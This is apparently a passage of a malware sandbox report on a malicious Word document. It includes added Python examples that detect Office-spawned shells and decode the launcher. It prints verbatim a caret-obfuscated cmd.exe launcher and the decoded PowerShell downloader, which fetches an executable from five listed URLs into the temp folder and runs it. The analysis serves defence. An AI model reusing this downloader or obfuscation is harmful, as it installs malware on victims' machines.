| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4972 wrote to memory of 1732 | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | C:\Windows\System32\cmd.exe |
| PID 4972 wrote to memory of 1732 | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | C:\Windows\System32\cmd.exe |
| PID 1732 wrote to memory of 4476 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1732 wrote to memory of 4476 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
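The "Process spawned unexpected child process" signature above and the WriteProcessMemory rows together give the process chain for this run: WINWORD.EXE (PID 4972) starts cmd.exe (PID 1732), which starts powershell.exe (PID 4476). The following is an added detection example, not part of the sandbox report, that reproduces that check over process-creation events: it walks each shell's parent chain looking for an Office binary and scores the child's command line for caret obfuscation. The events are constructed (the cmd.exe command line reuses the first fragments of the launcher recorded in this report; the explorer.exe PID, the benign cmd.exe and the PowerShell command line are made up) and the 0.1 caret-ratio threshold is an assumption.

```python
from collections import namedtuple

# Added example (not from the sandbox report): a detector for the
# "Process spawned unexpected child process" behaviour, run over
# process-creation events (Sysmon Event ID 1 style fields).
Proc = namedtuple("Proc", "pid ppid image cmdline")

OFFICE_IMAGES = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELL_IMAGES = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe",
                "cscript.exe", "mshta.exe"}


def image_name(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def ancestry(pid: int, by_pid: dict) -> list:
    """Process chain starting at pid and walking up through ppid (cycle-safe)."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(by_pid[pid])
        pid = by_pid[pid].ppid
    return chain


def caret_ratio(cmdline: str) -> float:
    """Share of '^' characters in the command line; 0 for normal commands."""
    return cmdline.count("^") / max(len(cmdline), 1)


def find_office_spawned_shells(events, caret_threshold: float = 0.1) -> list:
    """Flag every shell/script host that has an Office process as an ancestor.

    caret_threshold is an assumed heuristic; the launcher in this report is
    well above it, an ordinary 'cmd.exe /c dir' is at 0.
    """
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        if image_name(e.image) not in SHELL_IMAGES:
            continue
        chain = ancestry(e.pid, by_pid)
        office = next((p for p in chain[1:]
                       if image_name(p.image) in OFFICE_IMAGES), None)
        if office is None:
            continue
        findings.append({
            "pid": e.pid,
            "office_pid": office.pid,
            "chain": [image_name(p.image) for p in reversed(chain)],  # root first
            "caret_obfuscated": caret_ratio(e.cmdline) >= caret_threshold,
        })
    return findings


# Constructed events modelled on the behavioral2 tree in this report
# (WINWORD 4972 -> cmd 1732 -> powershell 4476). The cmd.exe command line
# reuses the first fragments of the report's launcher; explorer.exe's PID,
# the benign cmd.exe and the PowerShell command line are made up.
SAMPLE_EVENTS = [
    Proc(1000, 4, r"C:\Windows\explorer.exe", "explorer.exe"),
    Proc(4972, 1000, r"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE",
         r'"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n '
         r'"C:\Users\Admin\AppData\Local\Temp\sample.doc" /o ""'),
    Proc(1732, 4972, r"C:\Windows\System32\cmd.exe",
         r'C:\Windows\System32\cmd.exe /C"s^et ^PI^3=^W&&^s^e^t ^ZN^UW=^m'
         r'&&^se^t ^dq^z=^iO^I&&c^a^ll %hRUc%"'),
    Proc(4476, 1732, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
         "powershell $Rtd='http://example.invalid/a@http://example.invalid/b'.Split('@')"),
    Proc(2000, 1000, r"C:\Windows\System32\cmd.exe", "cmd.exe /c dir"),
]

if __name__ == "__main__":
    for finding in find_office_spawned_shells(SAMPLE_EVENTS):
        print(finding)
```

Run against the constructed events this reports both the cmd.exe and the powershell.exe under WINWORD.EXE, marks only the cmd.exe launcher as caret-obfuscated, and stays silent on the cmd.exe started from explorer.exe. The ancestry walk rather than a direct parent check is what catches the PowerShell stage, whose immediate parent is cmd.exe, not Office.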
Processes
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\747c9d7f8042899383819dbfa708255b_JaffaCakes118.doc" /o ""
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /C"s^et ^PI^3=^W&&^s^e^t ^ZN^UW=^m&&^se^t ^dq^z=^iO^I&&^se^t ^5H^Mw=^$&&s^e^t ^h^a=n&&^se^t mS^j^o=n^s&&s^e^t O8r^q=e^a&&^se^t u^o^4=^p&&s^e^t ^h^k=N&&^s^et NrVj=@h^t^tp^:&&^se^t ^Snj^k=^d&&^se^t ^oe^Z^J= ^ ^ ^ &&^se^t q^0^k=^ak^}&&s^e^t N^H=^l&&^set B^g=^t&&^s^e^t ^AHl4=h^t^t&&^set ^z^d=^Hr^e&&^s^et ^P^Uu=^G^A&&^s^et ^4r^G=w^t&&s^e^t 5^t=^a&&^s^et nV^m^z=^,&&^se^t ^8^0v=^ &&^se^t ^DP^FZ=^'&&^s^e^t ^QR=ZRS&&s^e^t pCV=c&&^s^e^t ^UM=^o&&s^e^t L^s=^@^h&&^s^et ^z^l^p=}^ &&^s^e^t O^z=^ ^= &&^s^et ^3^ZdR=^d&&^se^t ^L^k^2^K=^@&&^s^e^t ^SR=^.t^y^p&&s^e^t UnN=m/^K^P&&s^e^t ^uj^P=o&&^s^e^t ^L^Dt=^$^j^i&&^s^e^t nR^l=^e&&s^e^t v^8^5=^E&&^s^e^t ^0m=://&&s^e^t ^T^Q=^e^s&&^s^et ^Q4=^DRn^G'^.&&s^e^t s^z^O=^l/&&^s^e^t ^LC^S=^3&&s^e^t ^2^H=^p^o&&^s^e^t ^U^H=^p&&s^e^t 4^U^D^8=^o&&^se^t ^Z^E^Xk=(^$&&^s^et ^7^9D=/&&^s^e^t ^5^P^o=^Wb&&^s^e^t V^M=^tr&&^s^et ^I^1v=u^d^s&&^s^et w^S^E==^ &&s^e^t a^7^m=^h&&set ^I^t^Z=^-c&&^se^t cb1=^t&&s^e^t ^3^J^A=^'&&^s^et ^t^y=^p:&&^s^et s^8=^=N&&s^e^t N^x=^p^ow&&s^e^t ^t^L^j=^s&&^se^t D^d^5=^.&&^se^t t^l=^h^{^}&&s^e^t ^S^xLC=^0)^;&&s^e^t ^7I^d=^$^d^P^f&&^s^et ^d^Z=()^;&&^s^et ^b^T= ^ &&^s^et ^4^hy=^ &&^s^et A^I^ET=)&&^se^t ^3^zcn=^-&&^se^t ^8^1^X=^s &&^s^et ^4f^o=^ &&^s^e^t ^a^erZ=^i&&^se^t v^d^uH=^a&&s^et ^8^PW=c^h^y&&^s^et ^sE^K^p=^P&&^se^t ^B^Q=m^s&&s^e^t n^9=t&&^s^et ^Ms^p^h=^;&&^s^e^t U^y=^f&&^s^e^t u^3^0=^ht&&s^e^t ^I^aJ=^'&&s^e^t 0^p=y{^$^j&&^s^e^t ^S^o^3=^b&&^se^t R^sc^D=^O&&^s^e^t 3^Z=^en^u^y&&^se^t n^3=^l^e^.&&^s^et ^P^D=^ &&^s^e^t ^I^k^qV=v&&^s^et ^op^k=^'&&^set lN=^p&&^s^e^t ^DT^LR=e^X&&^s^et a^oe^D=^m&&^se^t ^p^Y^o^D=^q&&^s^e^t i^m=H^j&&^s^e^t A^0Z^L=av^et&&s^e^t ^3^g^W^1=^;$&&^s^e^t 3S^B^M=^$^j&&^se^t b^HA^L=^=&&^s^et wtN=^G^e&&^se^t Q^LT^y=^l^htt^p^'&&^s^et ^dw9=^t^T^e&&^se^t n^W^L=^m/&&s^e^t c^9^M=^m&&^s^et ^D0=^1^;&&^se^t ^S^s=^d&&^s^et M^g^o=c^h&&^s^et ^3^x=^.^wr&&s^e^t ^W^wf=^5^Y^b&&^s^e^t R^Gv^Q=P&&s^e^t ^Il^M^q=^f.^s&&^s^et ^l^T^4=x^m&&s^e^t ^qN=6^K^p&&s^e^t ^B^DI^J=^ &&^s^et ^q^UGd=.co&&^s^e^t 
^Dci^4=^e^'&&^se^t ^5^p^7=^in&&^s^e^t W^L^e=^m^ &&s^e^t C^8^f=^e&&s^e^t ^27=^A^eEc@&&^se^t ^S^i^t=n&&s^e^t ^Ur^Lz=^ &&s^e^t r^a=^t&&^s^et p^d^W=^$&&se^t ^Sp^D=v^t&&^s^et C^k^4=^e&&s^e^t n^tR=^o&&^s^e^t ^Bnr=^d&&s^e^t RVNp=^s&&^s^e^t ^uK^O^b=^.c^o&&^s^et mO^H^a=^b&&^se^t N^2^o=^h^e^l&&s^e^t s^b^9=^://^t^h&&^s^e^t ^h^3R=^s&&^se^t ^HXI='^,$^m&&^se^t ^tR^G^7=^en&&s^e^t V^d^l=^P&&^se^t ^w^K^0=^Hv&&^s^e^t ^t3=r&&s^e^t 4iY^2=^j^i^W&&^se^t a^O=^.i&&s^e^t 2^e=Rt^d)^{&&s^e^t RXV=^-c&&^s^e^t ^urM^o=f&&^se^t ^0QM^g=^o&&^s^e^t D^Y=w-^O^b^j&&s^e^t O^tz^Z=)&&^se^t ^qp^k=1&&^s^e^t l^T^b^p=ro&&s^et ^Tt^eJ=^t&&^s^et ^h^ijC=^h&&^s^e^t ^2Fh^Z=^'^@'&&s^e^t ^M^5=^i&&s^e^t Z^t=^p&&^s^et ^A^Y^k=(&&s^e^t ^M^hW=(&&s^e^t ^z^P=i^t^e(^$&&s^e^t ^P^G^T=^Y&&^se^t ^29=^b&&^s^et 4d^p=^W&&^s^et ^b^Uc=Hv&&^s^e^t M^w^l=;^b&&^se^t m^h^E=^P&&^s^et sp^5^K=^3C&&^s^et ^h3=^m&&^se^t ^h^a4^z=^x&&^s^et ^AG^J=^t&&s^e^t ^OE^Z=^t&&^s^e^t c^0=)^+'\n&&s^e^t ^ia=^e&&^se^t C^0^z^M=t^h(&&^s^e^t ^B^6cR=^G&&^s^e^t ^s^H^K^l=^I^O&&s^e^t C^s^Y=^$w&&^se^t r^HG^2=n&&^s^e^t ^LC=//^fas^h^i&&^s^e^t ^hs^g^5=^ &&s^e^t ^i^G^Q=c^a^tc&&s^e^t ^Wa=^t&&s^e^t ^zl=m^ ^'&&se^t ^0^xA=^jW^b^.re&&^s^e^t R^g^F^8=^.e&&^se^t ^wLV=y&&^s^e^t ^5^q=^.^l&&s^e^t ^0^TS^G=^w&&set ^s^p=^=&&^se^t ^Zn^6^a=^u&&s^e^t ^d^UN^z=^e&&^s^et ^p^bx=^.&&s^e^t ^5n^zy=^S&&^se^t P^YV=^e&&^se^t Z^7^6=^o&&^s^et H^Z=vur/&&s^e^t c^w^5=^m'^;&&^s^et ^0^xvt=^y&&^s^e^t u^E=^pe&&s^e^t ^H^P^o=$^d&&s^e^t ^W^EJN=^p://^o&&^se^t ^utX^l=8^Y&&s^e^t ^4^2^kn=.&&^s^et ^An7^8=^a&&^s^et ^2j=^$^j&&^s^e^t ^Z7^LH=^o&&^s^et c^D^PA=^'^ad&&s^e^t ^0^Ka=^K^t&&^s^e^t ^D1e^o=^t&&^s^et ^5qr=^p&&^se^t ^Am=^.&&^s^et ^A^8=^f&&^s^e^t ^Wu^h=^$^d^P&&^se^t pVG=^$&&^se^t ^3y^E=^.&&^se^t ^Q^kW=r&&^se^t CE^7^h=^s&&^se^t ^7V^Y^A=d^b^.s&&^s^et C^Db^Q=^ &&^se^t r^Y=^T&&^s^e^t ^wP^J=^ &&^se^t b^h=^e&&^s^e^t ^3C=r^s&&s^e^t ^8f=^b^d&&s^e^t ^i^qyU=^D^h^P&&^s^et ^Q1=c&&^s^et ^P^oc0=^.o&&s^e^t VtcG=Pr^oces&&^s^e^t ^4z^J=c^o&&s^e^t T^6=)^;&&s^e^t ^I^u6=c&&^se^t V^Lh^p=]^:^:&&^s^e^t q^3^Fv=^g&&^s^et C5z=^k&&^se^t nVc=^ 
&&^s^e^t ^0v=^tar&&^se^t ^d^q^9=^f^or&&^se^t t^6^UT=^i&&^se^t ^LW^a^p=^W&&s^e^t ^hln^D=^b^j^e&&set ^H^s2^8=l^it(&&^se^t V^J^ic=)^;^S&&^set r^l=/C&&^s^et ^O^PgC=c&&^se^t ^w^Q^TO=^t&&^s^e^t ^3yQ^o=^e(&&^s^e^t ^SF=c^i&&^s^e^t V^X=^ &&s^e^t b^e^f^U=^;&&s^e^t ^bp^1^e=^-&&^se^t HT^m^o=^t&&^s^et ^L^1=/&&se^t ^B^p=/&&^s^e^t r^w^px=^i^l&&^s^e^t ^wP^k=^m/&&^s^et ^zn=^a&&^s^e^t ^2H^qc=^$^j^i&&^s^e^t ^sW^y=.^op^en&&^s^e^t v^h=;^$R^t^d&&^s^e^t ^z^mc=^f&&s^e^t ^pI^ST=^dh&&s^e^t ^S^y^a=^W=([^S^y^s^te&&s^e^t ^T^6c^M=^x^m^l^2&&^s^e^t B^h^S^2=)^;&&^s^et ^zC^w=tr&&^se^t 2Np=^ &&^s^et ^Loj^q=^on^an&&^se^t ^B^8^Y^I=^t&&s^e^t T^K=^B^o^d&&^s^e^t N^w=^P^a^t&&^se^t r^F=^y&&^se^t r^I^i=s^e&&c^a^ll s^e^t hRUc=%N^x%%C^8^f%%^3C%%N^2^o%%N^H%%^B^DI^J%%C^s^Y%%^Sp^D%%b^HA^L%%^DP^FZ%%^QR%%^op^k%%v^h%%^s^p%%^3^J^A%%a^7^m%%^w^Q^TO%%^OE^Z%%Z^t%%s^b^9%%t^6^UT%%3^Z%%RVNp%%^SF%%^D1e^o%%^uK^O^b%%^wP^k%%^P^G^T%%^qN%%sp^5^K%%^I^k^qV%%NrVj%%^LC%%^Loj^q%%^pI^ST%%^Z7^LH%%a^oe^D%%^T^Q%%^AG^J%%r^F%%n^3%%^4z^J%%n^W^L%%^B^8^Y^I%%^0^xvt%%^uj^P%%^5^p^7%%H^Z%%^4r^G%%^I^1v%%^7^9D%%^LC^S%%i^m%%^p^Y^o^D%%^dq^z%%^z^d%%^L^k^2^K%%u^3^0%%n^9%%lN%%^0m%%^S^o^3%%mS^j^o%%q^3^Fv%%l^T^b^p%%^Zn^6^a%%u^o^4%%^8f%%^3y^E%%pCV%%n^tR%%UnN%%^P^Uu%%^DT^LR%%^27%%^AHl4%%^t^y%%^L^1%%^B^p%%^M^5%%^I^u6%%v^d^uH%%^Q^kW%%HT^m^o%%^5^q%%C5z%%r^l%%^W^wf%%^i^qyU%%L^s%%r^a%%cb1%%^W^EJN%%CE^7^h%%^An7^8%%^S^s%%^8^PW%%^q^UGd%%a^O%%s^z^O%%^utX^l%%^qp^k%%^Q4%%^5n^zy%%^U^H%%^H^s2^8%%^2Fh^Z%%T^6%%^2H^qc%%^S^y^a%%^ZN^UW%%^4^2^kn%%^s^H^K^l%%D^d^5%%N^w%%^h^ijC%%V^Lh^p%%wtN%%^dw9%%c^9^M%%^5qr%%V^d^l%%^zn%%C^0^z^M%%c^0%%^0^Ka%%R^g^F^8%%^h^a4^z%%^Dci^4%%B^h^S^2%%^2j%%4d^p%%^29%%V^X%%s^8%%C^k^4%%D^Y%%b^h%%^O^PgC%%^Tt^eJ%%nVc%%RXV%%Z^7^6%%^zl%%^B^Q%%^T^6c^M%%^Am%%^l^T^4%%Q^LT^y%%^3^g^W^1%%^Snj^k%%m^h^E%%^A^8%%O^z%%^h^k%%P^YV%%^0^TS^G%%^bp^1^e%%R^sc^D%%^hln^D%%^Q1%%^Wa%%C^Db^Q%%^I^t^Z%%^0QM^g%%W^L^e%%c^D^PA%%^UM%%^7V^Y^A%%V^M%%O8r^q%%c^w^5%%^d^q^9%%^d^UN^z%%5^t%%M^g^o%%^Z^E^Xk%%^h3%%^b^Uc%%^8^0v%%^a^erZ%%r^HG^2%%^wP^J%%pVG%%2^e%%^zC^w%%0^p%%^5^P^o%%^sW^y%%^M^hW%%^I^aJ
%%^B^6cR%%v^8^5%%r^Y%%^HXI%%^w^K^0%%nV^m^z%%^S^xLC%%3S^B^M%%^PI^3%%mO^H^a%%^p^bx%%^t^L^j%%^tR^G^7%%^Bnr%%^d^Z%%^7I^d%%^P^oc0%%u^E%%^S^i^t%%^A^Y^k%%O^tz^Z%%b^e^f^U%%^H^P^o%%R^Gv^Q%%^urM^o%%^SR%%^ia%%^4^hy%%w^S^E%%^D0%%^Wu^h%%U^y%%^3^x%%^z^P%%^0^xA%%^h^3R%%^2^H%%^h^a%%r^I^i%%T^K%%^wLV%%A^I^ET%%^Ms^p^h%%^5H^Mw%%^3^ZdR%%^sE^K^p%%^Il^M^q%%A^0Z^L%%4^U^D^8%%^z^mc%%r^w^px%%^3yQ^o%%p^d^W%%4iY^2%%V^J^ic%%^0v%%B^g%%^3^zcn%%VtcG%%^8^1^X%%^L^Dt%%^LW^a^p%%M^w^l%%^t3%%nR^l%%q^0^k%%^i^G^Q%%t^l%%^z^l^p%%2Np%%^4f^o%%^b^T%%^Ur^Lz%%^hs^g^5%%^oe^Z^J%%^P^D%&&c^a^ll %hRUc%"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell $wvt='ZRS';$Rtd='http://thienuyscit.com/Y6Kp3Cv@http://fashionandhomestyle.com/tyoinvur/wtuds/3HjqiOIHre@http://bnsgroupbd.com/KPGAeXAeEc@http://icart.lk/C5YbDhP@http://osadchy.co.il/8Y1DRnG'.Split('@');$jiW=([System.IO.Path]::GetTempPath()+'\nKt.exe');$jWb =New-Object -com 'msxml2.xmlhttp';$dPf = New-Object -com 'adodb.stream';foreach($mHv in $Rtd){try{$jWb.open('GET',$mHv,0);$jWb.send();$dPf.open();$dPf.type = 1;$dPf.write($jWb.responseBody);$dPf.savetofile($jiW);Start-Process $jiW;break}catch{}}
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4140 --field-trial-handle=2692,i,8678872182442199182,12502579059484928042,262144 --variations-seed-version /prefetch:8
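The cmd.exe command line recorded above is a two-pass cmd.exe obfuscation: every token is broken up with `^` escapes (which cmd.exe strips when it parses the line), several hundred `set NAME=fragment` assignments store one to six characters each, `call set hRUc=%a%%b%...` reassembles the fragments into one string, and `call %hRUc%` runs it. What comes out is the PowerShell downloader shown in the powershell.exe entry, which tries each `@`-separated URL in turn with msxml2.xmlhttp and adodb.stream, writes the first response it gets to `%TEMP%\nKt.exe`, starts it, and stops. The following is an added example, not part of the sandbox report, that implements both parse passes and then pulls the URL list and drop file name out of the resulting PowerShell. The short launcher it decodes is constructed in the same style as the report's; the PowerShell string is copied verbatim from this report.

```python
import re

# Added example (not from the sandbox report): deobfuscator for the
# caret + 'set' fragment + 'call %VAR%' launcher, plus IOC extraction
# for the PowerShell stage it produces.

# cmd.exe phase-2 parsing: '^' escapes the following character.
_CARET = re.compile(r"\^(.)", re.DOTALL)
# cmd.exe phase-1 parsing: %NAME% expansion (names are case-insensitive).
_PERCENT = re.compile(r"%([^%]+)%")
# Command separator '&&', unless the first '&' is caret-escaped.
_SEPARATOR = re.compile(r"(?<!\^)&&")


def strip_carets(text: str) -> str:
    return _CARET.sub(r"\1", text)


def expand(text: str, env: dict) -> str:
    # Undefined variables stay literally in place, as cmd.exe does on the
    # command line; that is what lets %hRUc% survive the first pass.
    return _PERCENT.sub(lambda m: env.get(m.group(1).upper(), m.group(0)), text)


def deobfuscate_cmd(cmdline: str):
    """Return (env, payload): the variables defined and the final 'call'ed command."""
    m = re.search(r'/C\s*"(.*)"\s*$', cmdline, re.DOTALL | re.IGNORECASE)
    body = m.group(1) if m else cmdline
    env, payload = {}, None
    for raw in _SEPARATOR.split(body):
        cmd = strip_carets(raw).lstrip()
        called = cmd[:5].lower() == "call "
        if called:
            # 'call' re-parses its argument, so %NAME% references are
            # expanded against the variables defined so far.
            cmd = expand(cmd[5:].lstrip(), env)
        if cmd[:4].lower() == "set " and "=" in cmd:
            name, _, value = cmd[4:].lstrip().partition("=")
            env[name.upper()] = value          # value keeps its leading spaces
        elif called:
            payload = cmd                      # 'call %hRUc%' -> the real command
    return env, payload


def extract_iocs(powershell: str) -> dict:
    """Pull the '@'-separated URL list and the drop file name out of the downloader."""
    urls = re.search(r"'([^']*)'\.Split\('@'\)", powershell)
    drop = re.search(r"GetTempPath\(\)\s*\+\s*'\\([^']+)'", powershell)
    return {
        "urls": urls.group(1).split("@") if urls else [],
        "drop_name": drop.group(1) if drop else None,
    }


# Constructed launcher in the style of the report's (five fragments instead of
# several hundred); it decodes to: powershell -c 'hi'
SAMPLE_CMDLINE = (
    r'C:\Windows\System32\cmd.exe /C"s^et ^a^1=^po&&^se^t b^2=w^er&&^s^et ^c3=s^h^e^l^l'
    r"&&^se^t d^4=^ ^-c&&s^e^t e5= ^'^h^i'&&c^a^ll s^e^t ^fin=%^a^1%%b^2%%^c3%%d^4%%e5%"
    r'&&c^a^ll %fin%"'
)

# The PowerShell stage exactly as the sandbox recorded it (copied from this report).
REPORT_POWERSHELL = (
    r"powershell $wvt='ZRS';$Rtd='http://thienuyscit.com/Y6Kp3Cv@http://fashionandhomestyle.com/"
    r"tyoinvur/wtuds/3HjqiOIHre@http://bnsgroupbd.com/KPGAeXAeEc@http://icart.lk/C5YbDhP@"
    r"http://osadchy.co.il/8Y1DRnG'.Split('@');$jiW=([System.IO.Path]::GetTempPath()+'\nKt.exe');"
    r"$jWb =New-Object -com 'msxml2.xmlhttp';$dPf = New-Object -com 'adodb.stream';"
    r"foreach($mHv in $Rtd){try{$jWb.open('GET',$mHv,0);$jWb.send();$dPf.open();$dPf.type = 1;"
    r"$dPf.write($jWb.responseBody);$dPf.savetofile($jiW);Start-Process $jiW;break}catch{}}"
)

if __name__ == "__main__":
    env, payload = deobfuscate_cmd(SAMPLE_CMDLINE)
    print(payload)
    for url in extract_iocs(REPORT_POWERSHELL)["urls"]:
        print(url)
```

The order of operations matters: carets are removed before `%NAME%` expansion, because `%N^x%` is not a defined variable on the first pass and only becomes `%Nx%` once the caret is gone, which is exactly why the launcher needs `call` for both the reassembly and the execution step. Feeding the report's full cmd.exe line to `deobfuscate_cmd` yields the same PowerShell one-liner the sandbox captured in the powershell.exe entry.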
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 240.76.109.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 36.242.123.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 101.58.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.141.79.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | thienuyscit.com | udp |
| US | 8.8.8.8:53 | fashionandhomestyle.com | udp |
| US | 160.153.0.79:80 | fashionandhomestyle.com | tcp |
| US | 8.8.8.8:53 | 79.0.153.160.in-addr.arpa | udp |
| US | 8.8.8.8:53 | bnsgroupbd.com | udp |
| US | 173.236.95.18:80 | bnsgroupbd.com | tcp |
| US | 8.8.8.8:53 | icart.lk | udp |
| US | 8.8.8.8:53 | osadchy.co.il | udp |
| US | 8.8.8.8:53 | 18.95.236.173.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | chromewebstore.googleapis.com | udp |
| US | 8.8.8.8:53 | chromewebstore.googleapis.com | udp |
| GB | 142.250.180.10:443 | chromewebstore.googleapis.com | tcp |
| US | 8.8.8.8:53 | 10.180.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 66.112.168.52.in-addr.arpa | udp |
Files
memory/4972-1-0x00007FF8C1AAD000-0x00007FF8C1AAE000-memory.dmp
memory/4972-2-0x00007FF881A90000-0x00007FF881AA0000-memory.dmp
memory/4972-3-0x00007FF881A90000-0x00007FF881AA0000-memory.dmp
memory/4972-0-0x00007FF881A90000-0x00007FF881AA0000-memory.dmp
memory/4972-7-0x00007FF881A90000-0x00007FF881AA0000-memory.dmp
memory/4972-6-0x00007FF8C1A10000-0x00007FF8C1C05000-memory.dmp
memory/4972-8-0x00007FF8C1A10000-0x00007FF8C1C05000-memory.dmp
memory/4972-5-0x00007FF881A90000-0x00007FF881AA0000-memory.dmp
memory/4972-4-0x00007FF8C1A10000-0x00007FF8C1C05000-memory.dmp
memory/4972-9-0x00007FF87F9A0000-0x00007FF87F9B0000-memory.dmp
memory/4972-10-0x00007FF87F9A0000-0x00007FF87F9B0000-memory.dmp
memory/4972-19-0x00007FF8C1A10000-0x00007FF8C1C05000-memory.dmp
memory/4972-20-0x00007FF8C1AAD000-0x00007FF8C1AAE000-memory.dmp
memory/4972-21-0x00007FF8C1A10000-0x00007FF8C1C05000-memory.dmp
memory/4972-25-0x00007FF8C1A10000-0x00007FF8C1C05000-memory.dmp
memory/4972-28-0x00007FF8C1A10000-0x00007FF8C1C05000-memory.dmp
memory/4972-41-0x00007FF8C1A10000-0x00007FF8C1C05000-memory.dmp
memory/4972-42-0x00007FF8C1A10000-0x00007FF8C1C05000-memory.dmp
memory/4972-43-0x00007FF8C1A10000-0x00007FF8C1C05000-memory.dmp
memory/4972-44-0x00007FF8C1A10000-0x00007FF8C1C05000-memory.dmp
memory/4476-45-0x000001C5A3310000-0x000001C5A3332000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5dlw1khu.2ba.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Temp\nKt.exe
| MD5 | daf667dff839d90be2889f60640ef444 |
| SHA1 | ea159d10aa7aaa6e6e41b952d245a2c29fe33b8e |
| SHA256 | 746957e736d8e6772177756c4ffd8c12b088545398f762582e6b741025f0ccdd |
| SHA512 | 439441ee7407c5163016190251deb6f72b50d59267821c9f4d7c2f7e32b78fc47594efff7aa68c996fe1666b276afd89918605ca255f9eaa16f89c0918c5dce0 |
memory/4972-68-0x00007FF8C1A10000-0x00007FF8C1C05000-memory.dmp
memory/4972-70-0x00007FF8C1A10000-0x00007FF8C1C05000-memory.dmp
memory/4972-71-0x00007FF8C1A10000-0x00007FF8C1C05000-memory.dmp
memory/4972-72-0x00007FF8C1A10000-0x00007FF8C1C05000-memory.dmp
memory/4972-73-0x00007FF8C1A10000-0x00007FF8C1C05000-memory.dmp
memory/4972-92-0x00007FF881A90000-0x00007FF881AA0000-memory.dmp
memory/4972-93-0x00007FF881A90000-0x00007FF881AA0000-memory.dmp
memory/4972-95-0x00007FF881A90000-0x00007FF881AA0000-memory.dmp
memory/4972-94-0x00007FF881A90000-0x00007FF881AA0000-memory.dmp
